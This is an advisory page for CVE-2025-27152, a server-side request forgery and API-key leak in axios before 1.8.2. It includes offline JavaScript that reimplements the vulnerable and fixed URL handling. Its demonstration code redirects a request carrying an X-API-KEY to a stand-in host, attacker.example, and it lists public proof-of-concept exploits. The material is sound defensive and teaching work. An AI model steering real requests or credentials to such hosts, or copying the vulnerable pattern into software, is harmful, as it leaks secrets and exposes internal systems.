CVE-2025-27152
SSRF vulnerability in axios (npm)
What is CVE-2025-27152 About?
This vulnerability in axios allows Server-Side Request Forgery and credential leakage when an absolute URL is passed to a request method, even if `baseURL` is set. The absolute URL overrides `baseURL` rather than being combined with it, so the request is sent to a destination the application never intended. Exploitation is straightforward for any attacker who controls the URL argument (or enough of it to make it absolute) used in an axios request.
Affected Software
axios (npm), versions before 1.8.2.
Technical Details
The vulnerability lies in how axios builds the request URL. When an absolute URL is passed as the url argument of a request method (for example get()) on an instance that has baseURL configured, axios does not combine the two: it discards baseURL and sends the request to the absolute URL as given. Any default headers configured on that instance, such as an X-API-KEY intended only for the baseURL host, are attached to that request as well and therefore arrive at whatever host the absolute URL names. The result is Server-Side Request Forgery, because the request can be steered to arbitrary internal or external hosts, and credential leakage, because the instance's authentication headers travel with it.
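The path-building logic described above, exercised offline as an added example (this is not axios's own source and not code from the advisory): isAbsoluteURL, combineURLs and buildFullPathVulnerable are modeled on the pre-1.8.2 axios helpers of the same names, createClient stands in for an axios instance with default headers and only records where a request would go, and the host names and API key are constructed. Note that the same regex that recognises `https://host` also treats a protocol-relative `//host` as absolute.

```javascript
// Added example, not code from axios or from the advisory: the pre-1.8.2
// URL-building logic reimplemented from axios's helpers of the same names,
// plus a fake client that records where a request would go instead of
// sending it. Host names and the API key below are constructed.

// Modeled on axios's isAbsoluteURL: "<scheme>://..." or protocol-relative "//...".
function isAbsoluteURL(url) {
  return /^([a-z][a-z\d+\-.]*:)?\/\//i.test(url);
}

// Modeled on axios's combineURLs: join baseURL and a relative path with one slash.
function combineURLs(baseURL, relativeURL) {
  return relativeURL
    ? baseURL.replace(/\/?\/$/, '') + '/' + relativeURL.replace(/^\/+/, '')
    : baseURL;
}

// Pre-fix buildFullPath: an absolute requestedURL replaces baseURL outright.
function buildFullPathVulnerable(baseURL, requestedURL) {
  if (baseURL && !isAbsoluteURL(requestedURL)) {
    return combineURLs(baseURL, requestedURL);
  }
  return requestedURL;
}

// Stand-in for axios.create({ baseURL, headers }): every request carries the
// instance's default headers, whatever host it ends up targeting.
function createClient(baseURL, defaultHeaders) {
  return {
    get(url) {
      const target = buildFullPathVulnerable(baseURL, url);
      return { target, headers: { ...defaultHeaders } }; // recorded, not sent
    },
  };
}

// Two ways application code might build the request URL from user input.
function fetchUser(client, userId) {
  return client.get(`/users/${encodeURIComponent(userId)}`); // path stays relative
}
function fetchRaw(client, userSuppliedUrl) {
  return client.get(userSuppliedUrl); // the anti-pattern the CVE is about
}

// Authority part of a target: strip "scheme://" or a leading "//".
function targetHost(target) {
  return target.replace(/^[^/]*\/\//, '').split('/')[0];
}

// null when the recorded request stays on the intended API host,
// otherwise the host the request (and its headers) would actually reach.
function leaksTo(recorded, baseURL) {
  const intended = new URL(baseURL).host;
  const actual = targetHost(recorded.target);
  return actual === intended ? null : actual;
}

const API = 'https://api.internal.example/v1';
const client = createClient(API, { 'X-API-KEY': 'constructed-secret' });

console.log(fetchUser(client, '42').target);                 // stays under /v1
const hijacked = fetchRaw(client, 'https://attacker.example/collect');
console.log(hijacked.target, leaksTo(hijacked, API), hijacked.headers); // key goes to attacker host
console.log(leaksTo(fetchRaw(client, '//attacker.example/collect'), API)); // protocol-relative too
```

The recorded object is what a real axios instance would hand to its adapter: the destination has changed but the default headers have not, which is the whole leak.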
What is the Impact of CVE-2025-27152?
Successful exploitation may allow attackers to perform Server-Side Request Forgery (SSRF), access internal network resources, exfiltrate sensitive credentials or API keys, and potentially compromise internal systems.
What is the Exploitability of CVE-2025-27152?
Exploitation requires that the attacker influence the URL passed to an axios request method in an application that relies on baseURL to pin the destination but does not validate that input. Complexity is low when the attacker controls the whole url argument, since supplying an absolute URL is enough to redirect the request. No authentication to the target is needed for the SSRF itself; credential leakage additionally requires that the instance or request carries authentication headers. The issue is remotely triggerable and applies to both server-side (Node.js) and client-side (browser) axios usage. The preconditions are a configured baseURL and untrusted, unvalidated input reaching the url argument; the risk is highest in applications that build request URLs dynamically from untrusted data without strict validation before calling axios.
What are the Known Public Exploits?
| PoC Author | Link | Commentary |
|---|---|---|
| andreglock | Link | Demonstration of CVE-2025-27152 |
| davidblakecoe | Link | Axios CVE-2025-27152 PoC |
What are the Available Fixes for CVE-2025-27152?
About the Fix from Resolved Security
The patch updates the URL-building logic to honour the allowAbsoluteUrls config option: when it is set to false, an absolute URL passed to a request method is combined with baseURL instead of replacing it, so the request cannot be redirected off the configured host. This addresses CVE-2025-27152, but note that allowAbsoluteUrls defaults to true for backward compatibility, so upgrading to 1.8.2 alone keeps the old behaviour. Applications must set allowAbsoluteUrls: false on the instance (or per request) and should still validate untrusted URL input before it reaches axios.
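The fixed path-building semantics and the recommended defence in depth, as an added example that is not axios's own source: buildFullPath reimplements the 1.8.2 behaviour (isAbsoluteURL and combineURLs modeled on the axios helpers of the same names) so the effect of allowAbsoluteUrls can be checked offline, and sameOriginPath is an application-side guard of my own that rejects any input which would resolve off the API origin. Host names are constructed; the axios.create() call is shown only in a comment because the example does not depend on the library.

```javascript
// Added example, not axios's own source: the 1.8.2 buildFullPath semantics
// reimplemented so the effect of allowAbsoluteUrls can be checked offline,
// plus an application-side guard that rejects off-origin input before it
// reaches the HTTP client. Host names are constructed.

function isAbsoluteURL(url) {
  return /^([a-z][a-z\d+\-.]*:)?\/\//i.test(url);
}

function combineURLs(baseURL, relativeURL) {
  return relativeURL
    ? baseURL.replace(/\/?\/$/, '') + '/' + relativeURL.replace(/^\/+/, '')
    : baseURL;
}

// Post-fix semantics: when allowAbsoluteUrls is false, an absolute requestedURL
// is appended to baseURL instead of replacing it. The option defaults to true,
// so upgrading alone leaves the old behaviour in place.
function buildFullPath(baseURL, requestedURL, allowAbsoluteUrls = true) {
  const isRelative = !isAbsoluteURL(requestedURL);
  if (baseURL && (isRelative || allowAbsoluteUrls === false)) {
    return combineURLs(baseURL, requestedURL);
  }
  return requestedURL;
}

// Defence in depth, independent of the library version: accept only input
// that, resolved against the API origin, still lands on that origin, and
// hand the client a normalized relative path. Throws on anything else.
function sameOriginPath(baseURL, userPath) {
  if (typeof userPath !== 'string' || isAbsoluteURL(userPath)) {
    throw new Error(`rejected: absolute or protocol-relative URL ${JSON.stringify(userPath)}`);
  }
  const base = new URL(baseURL);
  // WHATWG resolution handles the odd spellings: for an http(s) base,
  // "\\attacker.example" is parsed like "//attacker.example" and so changes
  // the origin, which the comparison below catches.
  const resolved = new URL(userPath, base);
  if (resolved.origin !== base.origin) {
    throw new Error(`rejected: ${JSON.stringify(userPath)} resolves to ${resolved.origin}`);
  }
  return resolved.pathname + resolved.search;
}

const API = 'https://api.internal.example/v1';

// With real axios >= 1.8.2 the instance would be created as
//   axios.create({ baseURL: API, allowAbsoluteUrls: false, headers: { 'X-API-KEY': key } })
// and user input would pass through sameOriginPath() before becoming the url argument.

console.log(buildFullPath(API, 'https://attacker.example/collect'));        // default: still bypasses
console.log(buildFullPath(API, 'https://attacker.example/collect', false)); // pinned under baseURL
for (const input of ['users/42?fields=name', 'https://attacker.example/x', '//attacker.example/x', '\\\\attacker.example/x']) {
  try {
    console.log(input, '->', sameOriginPath(API, input));
  } catch (e) {
    console.log(input, '->', e.message);
  }
}
```

The guard checks origin, not path: a same-origin input such as `../admin` is normalised and allowed through, which is the correct scope for an SSRF control; path-level authorisation remains the API's job.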
Available Upgrade Options
- axios
- <1.8.2 → Upgrade to 1.8.2
Additional Resources
- https://github.com/axios/axios/security/advisories/GHSA-jr5f-v2jv-69x6
- https://github.com/axios/axios/commit/fb8eec214ce7744b5ca787f2c3b8339b2f54b00f
- https://osv.dev/vulnerability/GHSA-jr5f-v2jv-69x6
- https://github.com/axios/axios
- https://nvd.nist.gov/vuln/detail/CVE-2025-27152
- https://github.com/axios/axios/releases/tag/v1.8.2
- https://github.com/axios/axios/issues/6463
What are Similar Vulnerabilities to CVE-2025-27152?
Similar Vulnerabilities: CVE-2023-38495, CVE-2021-39148, CVE-2023-28155, CVE-2023-46387, CVE-2021-22926
